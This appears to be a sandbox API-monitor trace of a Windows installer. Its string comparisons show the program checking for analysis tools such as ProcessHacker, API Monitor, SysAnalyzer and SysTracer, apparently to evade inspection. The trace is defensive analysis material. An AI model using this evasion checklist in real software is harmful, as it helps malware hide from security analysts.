lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, 
lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.523] lstrlenA (lpString="") returned 0 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.523] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrlenA (lpString="3399936") returned 7 [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.524] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.524] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.524] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.525] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.525] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.525] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.525] lstrcpynA (in: 
lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.525] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.525] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.525] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.525] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.525] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.525] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.525] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.525] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.525] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.525] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.525] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.526] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.526] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.526] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] 
lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrlenA (lpString="0") returned 1 [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrlenA (lpString="0") returned 1 [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrlenA (lpString="") returned 0 [0158.526] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrlenA (lpString="3399936") returned 7 [0158.526] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" 
[0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.526] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.527] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrlenA (lpString="") returned 0 [0158.527] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrlenA (lpString="") returned 0 [0158.527] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrlenA (lpString="") returned 0 [0158.527] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.527] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.528] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.528] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.528] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.528] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.528] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.528] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | 
out: lpString1="") returned="" [0158.528] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.528] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.528] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrlenA (lpString="0") returned 1 [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrlenA (lpString="0") returned 1 [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrlenA (lpString="") returned 0 [0158.529] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software 
SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrlenA (lpString="3399936") returned 7 [0158.529] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrlenA (lpString="") returned 0 [0158.529] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x337acc, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrlenA (lpString="") returned 0 [0158.530] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrlenA (lpString="") returned 0 [0158.530] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.530] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.530] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.530] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.530] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.530] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.531] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.531] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.531] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x341200, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.531] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.531] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.531] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 